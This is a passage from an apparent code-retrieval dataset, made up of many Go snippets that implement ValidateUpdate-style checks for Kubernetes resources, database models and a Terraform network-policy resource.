!reflect.DeepEqual(old.Spec, r.Spec) {\n\t\tallErrs = append(allErrs, field.Forbidden(field.NewPath(\"spec\"), \"cannot be modified\"))\n\t}\n\n\treturn aggregateObjErrors(r.GroupVersionKind().GroupKind(), r.Name, allErrs)\n}", "func (p *Photo) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Technology) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *K3sControlPlaneTemplate) ValidateUpdate(oldRaw runtime.Object) error {\n\tvar allErrs field.ErrorList\n\told, ok := oldRaw.(*K3sControlPlaneTemplate)\n\tif !ok {\n\t\treturn apierrors.NewBadRequest(fmt.Sprintf(\"expected a K3sControlPlaneTemplate but got a %T\", oldRaw))\n\t}\n\n\tif !reflect.DeepEqual(r.Spec.Template.Spec, old.Spec.Template.Spec) {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(field.NewPath(\"spec\", \"template\", \"spec\"), r, k3sControlPlaneTemplateImmutableMsg),\n\t\t)\n\t}\n\n\tif len(allErrs) == 0 {\n\t\treturn nil\n\t}\n\treturn apierrors.NewInvalid(GroupVersion.WithKind(\"K3sControlPlaneTemplate\").GroupKind(), r.Name, allErrs)\n}", "func ValidateDaemonSetSpecUpdate(newSpec, oldSpec *apps.DaemonSetSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\t// TemplateGeneration shouldn't be decremented\n\tif newSpec.TemplateGeneration < oldSpec.TemplateGeneration {\n\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"templateGeneration\"), newSpec.TemplateGeneration, \"must not be decremented\"))\n\t}\n\n\t// TemplateGeneration should be increased when and only when template is changed\n\ttemplateUpdated := !apiequality.Semantic.DeepEqual(newSpec.Template, oldSpec.Template)\n\tif newSpec.TemplateGeneration == oldSpec.TemplateGeneration && templateUpdated {\n\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"templateGeneration\"), newSpec.TemplateGeneration, \"must be incremented upon template update\"))\n\t} else if newSpec.TemplateGeneration > oldSpec.TemplateGeneration && !templateUpdated {\n\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"templateGeneration\"), newSpec.TemplateGeneration, \"must not be incremented without template update\"))\n\t}\n\n\treturn allErrs\n}", "func (t *Thing) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func (t *TeamResource) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (h *Handler) ValidateUpdate(ctx context.Context, _, newObj runtime.Object) error {\n\treturn h.handle(ctx, newObj)\n}", "func ValidateBackupBucketSpecUpdate(new, old *extensionsv1alpha1.BackupBucketSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child(\"type\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Region, old.Region, fldPath.Child(\"region\"))...)\n\n\treturn allErrs\n}", "func (r *OperationSet) ValidateUpdate(old runtime.Object) error {\n\toperationsetlog.Info(\"validating update of OperationSet\", \"operationset\", r.Name)\n\n\treturn r.validateOperationSet()\n}", "func (endpointSliceStrategy) ValidateUpdate(ctx context.Context, new, old runtime.Object) field.ErrorList {\n\tnewEPS := new.(*discovery.EndpointSlice)\n\toldEPS := old.(*discovery.EndpointSlice)\n\treturn validation.ValidateEndpointSliceUpdate(newEPS, oldEPS)\n}", "func (r *DaisyInstallation) ValidateUpdate(old runtime.Object) error {\n\tdaisyinstallationlog.Info(\"validate update\", \"name\", r.Name)\n\tif err := ValidateStorageLimit(r); err != nil {\n\t\treturn err\n\t}\n\tif err := ValidateScalInOut(r, old); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func ValidateControllerRegistrationSpecUpdate(new, old *core.ControllerRegistrationSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tkindTypeToPrimary := make(map[string]*bool, len(old.Resources))\n\tfor _, resource := range old.Resources {\n\t\tkindTypeToPrimary[resource.Kind+resource.Type] = resource.Primary\n\t}\n\tfor i, resource := range new.Resources {\n\t\tif primary, ok := kindTypeToPrimary[resource.Kind+resource.Type]; ok {\n\t\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(resource.Primary, primary, fldPath.Child(\"resources\").Index(i).Child(\"primary\"))...)\n\t\t}\n\t}\n\n\treturn allErrs\n}", "func (r *KeystoneAPI) ValidateUpdate(old runtime.Object) error {\n\tkeystoneapilog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (s *SocialSecurityNumber) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Test1) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateNetworkStatus(spec *extensionsv1alpha1.NetworkStatus, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (e *ExternalCfp) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateVMForUpdate(v *crimson.VM, mask *field_mask.FieldMask) error {\n\tswitch err := validateUpdateMask(mask); {\n\tcase v == nil:\n\t\treturn status.Error(codes.InvalidArgument, \"VM specification is required\")\n\tcase v.Name == \"\":\n\t\treturn status.Error(codes.InvalidArgument, \"hostname is required and must be non-empty\")\n\tcase err != nil:\n\t\treturn err\n\t}\n\tfor _, path := range mask.Paths {\n\t\t// TODO(smut): Allow IPv4 address to be updated.\n\t\tswitch path {\n\t\tcase \"name\":\n\t\t\treturn status.Error(codes.InvalidArgument, \"hostname cannot be updated, delete and create a new VM instead\")\n\t\tcase \"vlan\":\n\t\t\treturn status.Error(codes.InvalidArgument, \"VLAN cannot be updated, delete and create a new VM instead\")\n\t\tcase \"host\":\n\t\t\tif v.Host == \"\" {\n\t\t\t\treturn status.Error(codes.InvalidArgument, \"physical hostname is required and must be non-empty\")\n\t\t\t}\n\t\tcase \"host_vlan\":\n\t\t\treturn status.Error(codes.InvalidArgument, \"host VLAN cannot be updated, update the host instead\")\n\t\tcase \"os\":\n\t\t\tif v.Os == \"\" {\n\t\t\t\treturn status.Error(codes.InvalidArgument, \"operating system is required and must be non-empty\")\n\t\t\t}\n\t\tcase \"state\":\n\t\t\tif v.State == states.State_STATE_UNSPECIFIED {\n\t\t\t\treturn status.Error(codes.InvalidArgument, \"state is required\")\n\t\t\t}\n\t\tcase \"description\":\n\t\t\t// Empty description is allowed, nothing to validate.\n\t\tcase \"deployment_ticket\":\n\t\t\t// Empty deployment ticket is allowed, nothing to validate.\n\t\tdefault:\n\t\t\treturn status.Errorf(codes.InvalidArgument, \"unsupported update mask path %q\", path)\n\t\t}\n\t}\n\treturn nil\n}", "func (e NetEvent) Validate() (bool, error) {\n\tif !e.isValidated {\n\t\tif e.NetDevice == \"\" {\n\t\t\treturn false, fmt.Errorf(\"source device for event not specified\")\n\t\t}\n\t}\n\treturn true, nil\n}", "func (e *Event) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Target) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (o *BaseEdgeLBPoolSpec) ValidateTransition(previous *BaseEdgeLBPoolSpec) error {\n\t// If we're transitioning to a cloud-provider configuration, we don't need to perform any additional validations, as a new EdgeLB pool will always be created.\n\tif *previous.CloudProviderConfiguration == \"\" && *o.CloudProviderConfiguration != \"\" {\n\t\treturn nil\n\t}\n\t// Prevent the cloud-provider configuration from being removed.\n\tif *previous.CloudProviderConfiguration != \"\" && *o.CloudProviderConfiguration == \"\" {\n\t\treturn fmt.Errorf(\"the cloud-provider configuration cannot be removed\")\n\t}\n\t// Prevent the name of the EdgeLB pool from changing.\n\tif *previous.Name != *o.Name {\n\t\treturn errors.New(\"the name of the target edgelb pool cannot be changed\")\n\t}\n\t// Prevent the role of the EdgeLB pool from changing.\n\tif *previous.Role != *o.Role {\n\t\treturn errors.New(\"the role of the target edgelb pool cannot be changed\")\n\t}\n\t// Prevent the virtual network of the target EdgeLB pool from changing.\n\tif *previous.Network != *o.Network {\n\t\treturn errors.New(\"the virtual network of the target edgelb pool cannot be changed\")\n\t}\n\treturn nil\n}", "func (p *Provider) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Friend) ValidateUpdate(old runtime.Object) error {\n\tfriendlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn r.validateFriend()\n}", "func (s imageRepositoryStrategy) ValidateUpdate(obj, old runtime.Object) errors.ValidationErrorList {\n\trepo := obj.(*api.ImageRepository)\n\toldRepo := old.(*api.ImageRepository)\n\n\trepo.Status = oldRepo.Status\n\tif repo.Status.Tags == nil {\n\t\trepo.Status.Tags = make(map[string]api.TagEventList)\n\t}\n\n\trepo.Status.DockerImageRepository = s.dockerImageRepository(repo)\n\tupdateTagHistory(repo)\n\n\treturn validation.ValidateImageRepositoryUpdate(repo, oldRepo)\n}", "func (detailsStrategy) ValidateUpdate(ctx context.Context, obj, old runtime.Object) field.ErrorList {\n\tnewBuild := obj.(*buildapi.Build)\n\toldBuild := old.(*buildapi.Build)\n\toldRevision := oldBuild.Spec.Revision\n\tnewRevision := newBuild.Spec.Revision\n\terrors := field.ErrorList{}\n\n\tif newRevision == nil && oldRevision != nil {\n\t\terrors = append(errors, field.Invalid(field.NewPath(\"spec\", \"revision\"), nil, \"cannot set an empty revision in build spec\"))\n\t}\n\tif !reflect.DeepEqual(oldRevision, newRevision) && oldRevision != nil {\n\t\t// If there was already a revision, then return an error\n\t\terrors = append(errors, field.Duplicate(field.NewPath(\"spec\", \"revision\"), oldBuild.Spec.Revision))\n\t}\n\treturn errors\n}", "func (obj *RabbitQueue) ValidateUpdate(old runtime.Object) error {\n\trabbitQueueLog.Info(\"validate update\", \"name\", obj.Name, \"namespace\", obj.Namespace)\n\treturn obj.validate()\n}", "func (in *NetworkSpec) DeepCopy() *NetworkSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (r *ScalewayWebhook) ValidateUpdate(ctx context.Context, oldObj runtime.Object, obj runtime.Object) (field.ErrorList, error) {\n\treturn r.ScalewayManager.ValidateUpdate(ctx, oldObj, obj)\n}", "func (m *UpdateCapabilityRequest) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateAttributes(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCommands(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (w *Widget) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (p *PlayerShot) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (b BlueprintReference) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (sm *Statemgr) OnNetworkSecurityPolicyUpdateReq(nodeID string, objinfo *netproto.NetworkSecurityPolicy) error {\n\treturn nil\n}", "func (r *AWSMachineTemplateWebhook) ValidateUpdate(ctx context.Context, oldRaw runtime.Object, newRaw runtime.Object) error {\n\tnewAWSMachineTemplate, ok := newRaw.(*AWSMachineTemplate)\n\tif !ok {\n\t\treturn apierrors.NewBadRequest(fmt.Sprintf(\"expected a AWSMachineTemplate but got a %T\", newRaw))\n\t}\n\toldAWSMachineTemplate, ok := oldRaw.(*AWSMachineTemplate)\n\tif !ok {\n\t\treturn apierrors.NewBadRequest(fmt.Sprintf(\"expected a AWSMachineTemplate but got a %T\", oldRaw))\n\t}\n\n\treq, err := admission.RequestFromContext(ctx)\n\tif err != nil {\n\t\treturn apierrors.NewBadRequest(fmt.Sprintf(\"expected a admission.Request inside context: %v\", err))\n\t}\n\n\tvar allErrs field.ErrorList\n\n\tif !topology.ShouldSkipImmutabilityChecks(req, newAWSMachineTemplate) && !cmp.Equal(newAWSMachineTemplate.Spec, oldAWSMachineTemplate.Spec) {\n\t\tif oldAWSMachineTemplate.Spec.Template.Spec.InstanceMetadataOptions == nil {\n\t\t\toldAWSMachineTemplate.Spec.Template.Spec.InstanceMetadataOptions = newAWSMachineTemplate.Spec.Template.Spec.InstanceMetadataOptions\n\t\t}\n\n\t\tif !cmp.Equal(newAWSMachineTemplate.Spec.Template.Spec, oldAWSMachineTemplate.Spec.Template.Spec) {\n\t\t\tallErrs = append(allErrs,\n\t\t\t\tfield.Invalid(field.NewPath(\"spec\", \"template\", \"spec\"), newAWSMachineTemplate, \"AWSMachineTemplate.Spec is immutable\"),\n\t\t\t)\n\t\t}\n\t}\n\n\treturn aggregateObjErrors(newAWSMachineTemplate.GroupVersionKind().GroupKind(), newAWSMachineTemplate.Name, allErrs)\n}", "func (p *PullrequestAssignee) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (s *Single) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateManagedSeedSetSpecUpdate(newSpec, oldSpec *seedmanagement.ManagedSeedSetSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\t// Ensure selector is not changed\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(newSpec.Selector, oldSpec.Selector, fldPath.Child(\"selector\"))...)\n\n\t// Ensure revisionHistoryLimit is not changed\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(newSpec.RevisionHistoryLimit, oldSpec.RevisionHistoryLimit, fldPath.Child(\"revisionHistoryLimit\"))...)\n\n\t// Validate updates to template and shootTemplate\n\tallErrs = append(allErrs, ValidateManagedSeedTemplateUpdate(&newSpec.Template, &oldSpec.Template, fldPath.Child(\"template\"))...)\n\tallErrs = append(allErrs, corevalidation.ValidateShootTemplateUpdate(&newSpec.ShootTemplate, &oldSpec.ShootTemplate, fldPath.Child(\"shootTemplate\"))...)\n\n\treturn allErrs\n}", "func (r *Review) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateNetworkInputs(p netintents.Network) error {\n\t// validate name\n\terrs := validation.IsValidName(p.Metadata.Name)\n\tif len(errs) > 0 {\n\t\treturn pkgerrors.Errorf(\"Invalid network name - name=[%v], errors: %v\", p.Metadata.Name, errs)\n\t}\n\n\t// validate cni type\n\tfound := false\n\tfor _, val := range nettypes.CNI_TYPES {\n\t\tif p.Spec.CniType == val {\n\t\t\tfound = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !found {\n\t\treturn pkgerrors.Errorf(\"Invalid cni type: %v\", p.Spec.CniType)\n\t}\n\n\tsubnets := p.Spec.Ipv4Subnets\n\tfor _, subnet := range subnets {\n\t\terr := nettypes.ValidateSubnet(subnet)\n\t\tif err != nil {\n\t\t\treturn pkgerrors.Wrap(err, \"invalid subnet\")\n\t\t}\n\t}\n\treturn nil\n}", "func (o *OrganizerInvitation) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Room) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Task) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Domain) ValidateUpdate(old runtime.Object) error {\n\tdomainlog.Info(\"validate update\", \"name\", r.Name)\n\n\toldDomain, ok := old.(*Domain)\n\n\tif !ok {\n\t\treturn fmt.Errorf(\"old is not *Domain, %+v\", old)\n\t}\n\n\tif oldDomain.Spec.Domain != r.Spec.Domain {\n\t\treturn fmt.Errorf(\"domain is immutable, should not change it, old: %+v, new: %+v\", oldDomain, r)\n\t}\n\n\treturn nil\n}", "func (m *ResourceControlUpdateRequest) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (credential *FederatedIdentityCredential) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := credential.updateValidations()\n\tvar temp any = credential\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (s *Series) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (rule *NamespacesEventhubsAuthorizationRule) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := rule.updateValidations()\n\tvar temp any = rule\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (m *Move) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (d *Datasource) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *MachineDeployment) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\toldMD, ok := old.(*MachineDeployment)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(fmt.Sprintf(\"expected a MachineDeployment but got a %T\", old))\n\t}\n\treturn nil, m.validate(oldMD)\n}", "func (r *BackupLocation) ValidateUpdate(old runtime.Object) error {\n\tbackuplocationlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func ValidateCollectorUpdate(collector *monitor.Collector, old *monitor.Collector) field.ErrorList {\n\tallErrs := apimachineryvalidation.ValidateObjectMetaUpdate(&collector.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))\n\tallErrs = append(allErrs, ValidateCollector(collector)...)\n\n\tif collector.Spec.ClusterName != old.Spec.ClusterName {\n\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"spec\", \"clusterName\"), collector.Spec.ClusterName, \"disallowed change the cluster name\"))\n\t}\n\n\tif collector.Spec.TenantID != old.Spec.TenantID {\n\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"spec\", \"tenantID\"), collector.Spec.TenantID, \"disallowed change the tenant\"))\n\t}\n\n\tif collector.Spec.Type != old.Spec.Type {\n\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"spec\", \"type\"), collector.Spec.Type, \"type is immutable\"))\n\t}\n\n\tif collector.Status.Phase == \"\" {\n\t\tallErrs = append(allErrs, field.Required(field.NewPath(\"status\", \"phase\"), string(collector.Status.Phase)))\n\t}\n\n\treturn allErrs\n}", "func resourceVolterraNetworkPolicyRuleUpdate(d *schema.ResourceData, meta interface{}) error {\n\tclient := meta.(*APIClient)\n\n\tupdateMeta := &ves_io_schema.ObjectReplaceMetaType{}\n\tupdateSpec := &ves_io_schema_network_policy_rule.ReplaceSpecType{}\n\tupdateReq := &ves_io_schema_network_policy_rule.ReplaceRequest{\n\t\tMetadata: updateMeta,\n\t\tSpec: updateSpec,\n\t}\n\tif v, ok := d.GetOk(\"annotations\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tupdateMeta.Annotations = ms\n\t}\n\n\tif v, ok := d.GetOk(\"description\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Description =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"disable\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Disable =\n\t\t\tv.(bool)\n\t}\n\n\tif v, ok := d.GetOk(\"labels\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tupdateMeta.Labels = ms\n\t}\n\n\tif v, ok := d.GetOk(\"name\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Name =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"namespace\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Namespace =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"action\"); ok && !isIntfNil(v) {\n\n\t\tupdateSpec.Action = ves_io_schema_network_policy_rule.NetworkPolicyRuleAction(ves_io_schema_network_policy_rule.NetworkPolicyRuleAction_value[v.(string)])\n\n\t}\n\n\tif v, ok := d.GetOk(\"advanced_action\"); ok && !isIntfNil(v) {\n\n\t\tsl := v.(*schema.Set).List()\n\t\tadvancedAction := &ves_io_schema_network_policy_rule.NetworkPolicyRuleAdvancedAction{}\n\t\tupdateSpec.AdvancedAction = advancedAction\n\t\tfor _, set := range sl {\n\t\t\tadvancedActionMapStrToI := set.(map[string]interface{})\n\n\t\t\tif v, ok := advancedActionMapStrToI[\"action\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tadvancedAction.Action = ves_io_schema_network_policy_rule.LogAction(ves_io_schema_network_policy_rule.LogAction_value[v.(string)])\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"label_matcher\"); ok && !isIntfNil(v) {\n\n\t\tsl := v.(*schema.Set).List()\n\t\tlabelMatcher := &ves_io_schema.LabelMatcherType{}\n\t\tupdateSpec.LabelMatcher = labelMatcher\n\t\tfor _, set := range sl {\n\t\t\tlabelMatcherMapStrToI := set.(map[string]interface{})\n\n\t\t\tif w, ok := labelMatcherMapStrToI[\"keys\"]; ok && !isIntfNil(w) {\n\t\t\t\tls := make([]string, len(w.([]interface{})))\n\t\t\t\tfor i, v := range w.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tlabelMatcher.Keys = ls\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"ports\"); ok && !isIntfNil(v) {\n\n\t\tls := make([]string, len(v.([]interface{})))\n\t\tfor i, v := range v.([]interface{}) {\n\t\t\tls[i] = v.(string)\n\t\t}\n\t\tupdateSpec.Ports = ls\n\n\t}\n\n\tif v, ok := d.GetOk(\"protocol\"); ok && !isIntfNil(v) {\n\n\t\tupdateSpec.Protocol =\n\t\t\tv.(string)\n\n\t}\n\n\tremoteEndpointTypeFound := false\n\n\tif v, ok := d.GetOk(\"ip_prefix_set\"); ok && !remoteEndpointTypeFound {\n\n\t\tremoteEndpointTypeFound = true\n\t\tremoteEndpointInt := &ves_io_schema_network_policy_rule.ReplaceSpecType_IpPrefixSet{}\n\t\tremoteEndpointInt.IpPrefixSet = &ves_io_schema.IpPrefixSetRefType{}\n\t\tupdateSpec.RemoteEndpoint = remoteEndpointInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"ref\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\trefInt := make([]*ves_io_schema.ObjectRefType, len(sl))\n\t\t\t\tremoteEndpointInt.IpPrefixSet.Ref = refInt\n\t\t\t\tfor i, ps := range sl {\n\n\t\t\t\t\trMapToStrVal := ps.(map[string]interface{})\n\t\t\t\t\trefInt[i] = &ves_io_schema.ObjectRefType{}\n\n\t\t\t\t\trefInt[i].Kind = \"ip_prefix_set\"\n\n\t\t\t\t\tif v, ok := rMapToStrVal[\"name\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\trefInt[i].Name = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := rMapToStrVal[\"namespace\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\trefInt[i].Namespace = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := rMapToStrVal[\"tenant\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\trefInt[i].Tenant = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := rMapToStrVal[\"uid\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\trefInt[i].Uid = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"prefix\"); ok && !remoteEndpointTypeFound {\n\n\t\tremoteEndpointTypeFound = true\n\t\tremoteEndpointInt := &ves_io_schema_network_policy_rule.ReplaceSpecType_Prefix{}\n\t\tremoteEndpointInt.Prefix = &ves_io_schema.PrefixListType{}\n\t\tupdateSpec.RemoteEndpoint = remoteEndpointInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"ipv6_prefix\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tremoteEndpointInt.Prefix.Ipv6Prefix = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"prefix\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tremoteEndpointInt.Prefix.Prefix = ls\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"prefix_selector\"); ok && !remoteEndpointTypeFound {\n\n\t\tremoteEndpointTypeFound = true\n\t\tremoteEndpointInt := &ves_io_schema_network_policy_rule.ReplaceSpecType_PrefixSelector{}\n\t\tremoteEndpointInt.PrefixSelector = &ves_io_schema.LabelSelectorType{}\n\t\tupdateSpec.RemoteEndpoint = remoteEndpointInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"expressions\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tremoteEndpointInt.PrefixSelector.Expressions = ls\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tlog.Printf(\"[DEBUG] Updating Volterra NetworkPolicyRule obj with struct: %+v\", updateReq)\n\n\terr := client.ReplaceObject(context.Background(), ves_io_schema_network_policy_rule.ObjectType, updateReq)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error updating NetworkPolicyRule: %s\", err)\n\t}\n\n\treturn resourceVolterraNetworkPolicyRuleRead(d, meta)\n}", "func (store *ConfigurationStore) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := store.updateValidations()\n\tvar temp any = store\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (r *Water) ValidateUpdate(old runtime.Object) error {\n\t//waterlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (mw *azureManagedControlPlaneWebhook) ValidateUpdate(ctx context.Context, oldObj, newObj runtime.Object) (admission.Warnings, error) {\n\tvar allErrs field.ErrorList\n\told, ok := oldObj.(*AzureManagedControlPlane)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(\"expected an AzureManagedControlPlane\")\n\t}\n\tm, ok := newObj.(*AzureManagedControlPlane)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(\"expected an AzureManagedControlPlane\")\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", 